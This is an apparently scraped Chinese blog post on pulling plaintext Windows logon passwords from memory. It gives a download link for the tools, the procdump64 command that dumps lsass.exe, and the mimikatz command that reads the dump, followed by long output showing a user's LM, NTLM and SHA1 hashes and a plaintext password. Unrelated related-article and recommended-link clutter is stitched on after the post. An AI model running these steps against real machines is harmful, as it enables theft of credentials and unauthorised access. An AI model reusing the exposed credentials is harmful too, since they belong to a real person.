使用procdump64+mimikatz可实现从内存中获取明文密码

工具

链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38

首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样

1.导出lsass.exe

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

(注:必须使用管理员权限)

ProcDump v8.0 - Writes process dump files

Copyright (C) 2009-2016 Mark Russinovich

Sysinternals - www.sysinternals.com

With contributions from Andrew Richards

[15:33:26] Dump 1 initiated: C:\Users\chenglee\Desktop\Procdump\lsass.dmp

[15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.

[15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds

[15:33:28] Dump count reached.

2.执行mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(注:必须使用管理员权限)

ECHO 处于打开状态。

  .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!

 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)

 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz

 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )

  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # sekurlsa::minidump lsass.dmp

Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonPasswords full

Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 137859 (00000000:00021a83)

Session           : Interactive from 1

User Name         : chenglee

Domain            : chenglee-PC

Logon Server      : CHENGLEE-PC

Logon Time        : 2018/7/25 15:06:35

SID               : S-1-5-21-452281122-3045282507-3243563612-1000

	msv :

	 [00000003] Primary

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde

	 * NTLM     : 8d0f8e1a18236379538411a9056799f5

	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20

	tspkg :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	wdigest :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	kerberos :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	ssp :

	credman :	

Authentication Id : 0 ; 137821 (00000000:00021a5d)

Session           : Interactive from 1

User Name         : chenglee

Domain            : chenglee-PC

Logon Server      : CHENGLEE-PC

Logon Time        : 2018/7/25 15:06:35

SID               : S-1-5-21-452281122-3045282507-3243563612-1000

	msv :

	 [00000003] Primary

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde

	 * NTLM     : 8d0f8e1a18236379538411a9056799f5

	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20

	tspkg :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	wdigest :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	kerberos :

	 * Username : chenglee

	 * Domain   : chenglee-PC

	 * Password : lizhenghua

	ssp :

	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)

Session           : Service from 0

User Name         : LOCAL SERVICE

Domain            : NT AUTHORITY

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:15

SID               : S-1-5-19

	msv :

	tspkg :

	wdigest :

	 * Username : (null)

	 * Domain   : (null)

	 * Password : (null)

	kerberos :

	 * Username : (null)

	 * Domain   : (null)

	 * Password : (null)

	ssp :

	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)

Session           : Service from 0

User Name         : CHENGLEE-PC$

Domain            : WORKGROUP

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:15

SID               : S-1-5-20

	msv :

	tspkg :

	wdigest :

	 * Username : CHENGLEE-PC$

	 * Domain   : WORKGROUP

	 * Password : (null)

	kerberos :

	 * Username : chenglee-pc$

	 * Domain   : WORKGROUP

	 * Password : (null)

	ssp :

	credman :	

Authentication Id : 0 ; 48630 (00000000:0000bdf6)

Session           : UndefinedLogonType from 0

User Name         : (null)

Domain            : (null)

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:06

SID               :

	msv :

	tspkg :

	wdigest :

	kerberos :

	ssp :

	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)

Session           : UndefinedLogonType from 0

User Name         : CHENGLEE-PC$

Domain            : WORKGROUP

Logon Server      : (null)

Logon Time        : 2018/7/25 15:06:05

SID               : S-1-5-18

	msv :

	tspkg :

	wdigest :

	 * Username : CHENGLEE-PC$

	 * Domain   : WORKGROUP

	 * Password : (null)

	kerberos :

	 * Username : chenglee-pc$

	 * Domain   : WORKGROUP

	 * Password : (null)

	ssp :

	credman :	

mimikatz(commandline) # exit

Bye!

看, 密码[lizhenghua]处于明文暴露状态.

如果不是使用管理员模式运行cmd会报错,

两步完成利用procdump64+mimikatz获取win用户密码的更多相关文章

  1. procdump64+mimikatz获取win用户hash密码

    1.导出lsass.exe procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2.执行mimikatz mimikatz.exe "sek ...

  2. 微信公众平台开发—利用OAuth2.0获取微信用户基本信息

    在借鉴前两篇获取微信用户基本信息的基础下,本人也总结整理了一些个人笔记:如何通过OAuth2.0获取微信用户信息 1.首先在某微信平台下配置OAuth2.0授权回调页面: 2.通过appid构造url ...

  3. SpringBoot中获取微信用户信息从未如此简单!

    前言 不知道你是否参加过拼多多上邀请微信好友砍价功能,这个功能实现首先需要考虑的就是获取微信用户的信息.获取用户信息就是获取公众号下微信用户的信息,今天我就来讲讲如何从公众号下获取微信用户信息. 需要 ...

  4. 利用procdump+Mimikatz 绕过杀软获取Windows明文密码(转)

    Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载.但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可 ...

  5. Android 两步搞定Fragment的返回键

    Fragment可以说是在Android开发必需要使用到技术,项目中的界面基本上都是使用Fragment来实现,而Activity只是作为Fragment的载体,但有些特殊情况下Fragment也不得 ...

  6. Kubernetes 两步验证 - 使用 Serverless 实现动态准入控制

    作者:CODING - 王炜 1. 背景 如果对 Kubernetes 集群安全特别关注,那么我们可能想要实现这些需求: 如何实现 Kubernetes 集群的两步验证,除了集群凭据,还需要提供一次性 ...

  7. 七牛云如何绑定二次验证码_虚拟MFA_两步验证_谷歌身份验证器?

    一般情况下,点账户名——账户设置——安全设置,即可开通两步验证 具体步骤见链接  七牛云如何绑定二次验证码_虚拟MFA_两步验证_谷歌身份验证器?   二次验证码小程序(官网)对比谷歌身份验证器APP ...

  8. 挑子学习笔记:两步聚类算法(TwoStep Cluster Algorithm)——改进的BIRCH算法

    转载请标明出处:http://www.cnblogs.com/tiaozistudy/p/twostep_cluster_algorithm.html 两步聚类算法是在SPSS Modeler中使用的 ...

  9. 每次Xcode 升级之后 插件失效,两步解决

    以下内容来源:http://www.cocoachina.com/bbs/read.php?tid=296269 每次Xcode 升级之后 插件失效,两步解决 1.打开终端,输入以下代码获取到DVTP ...

随机推荐

  1. iOS UI基础-11.0 UINavigationController

    导航控制器 利用UINavigationController,可以轻松地管理多个控制器,轻松完成控制器之间的切换,典型例子就是系统自带的“设置”应用 UINavigationController的使用 ...

  2. Unable to update the EntitySet 'T_JsAPI' because it has a DefiningQuery and no <InsertFunction> element exists in the <ModificationFunctionMapping> element to support the current operation.

    前几天使用EF6的Db First模式改造了支付中心的数据访问层,废弃了ado.net. 同时,使用T4把实体类生成到了model层的PO目录下. 今天在db里新建了一张表,在edmx文件里更新模型( ...

  3. php 提取多维数组指定列

    前言:有时候在开发中会遇到这样的问题,我们需要把有规律的多维数组按照纵向(列)取出,有下面的方法可用: 我们将拿下面的数组来处理: 1 $arr = array( 2 '0' => array( ...

  4. mysql 命令一套

    MySQL mysql -h主机地址 -u用户名 -p用户密码 首先打开DOS窗口,然后进入目录mysql\bin,再键入命令mysql -u root  -p,回车后提示你输密码.注意用户名前可以有 ...

  5. ajax提交完表单数据依然跳转的解决办法

    1. 既然ajax提交数据,就把表单里面submit按钮换掉,因为触发submit他就会跳转页面 提交的时候他会先触发ajax 再触发submit的提交 2.如果确定了表单没有submit,那么把提交 ...

  6. webpack使用三

    Webpack的强大功能 生成Source Maps(使调试更容易) 开发总是离不开调试,方便的调试能极大的提高开发效率,不过有时候通过打包后的文件,你是不容易找到出错了的地方,对应的你写的代码的位置 ...

  7. Ubuntu 16.04卸载一些不必要的预装软件

    卸载libreoffices ~$ sudo apt-get remove libreoffice-common 卸载Amazon的链接 ~$ sudo apt-get remove unity-we ...

  8. UI界面之淡入淡出

    1.using UnityEngine; using System.Collections; using UnityEngine.UI; public class danrudanchu : Mono ...

  9. c# 在mongo中查询经纬度范围

    #region 索引 //IndexKeysDocument doc = new IndexKeysDocument();//新建索引 //2d 平面坐标索引,适用于基于平面的坐标计算.也支持球面距离 ...

  10. MYSQL5.6.X 非在线安装版(解压版)安装过程

    一.卸载以前旧版本(本人5.5版本) 1.关闭MySQL服务 以管理员身份运行cmd,执行以下命令: net stop mysql 或者右键我的电脑,在管理——服务——停止MySQL 2.卸载MySQ ...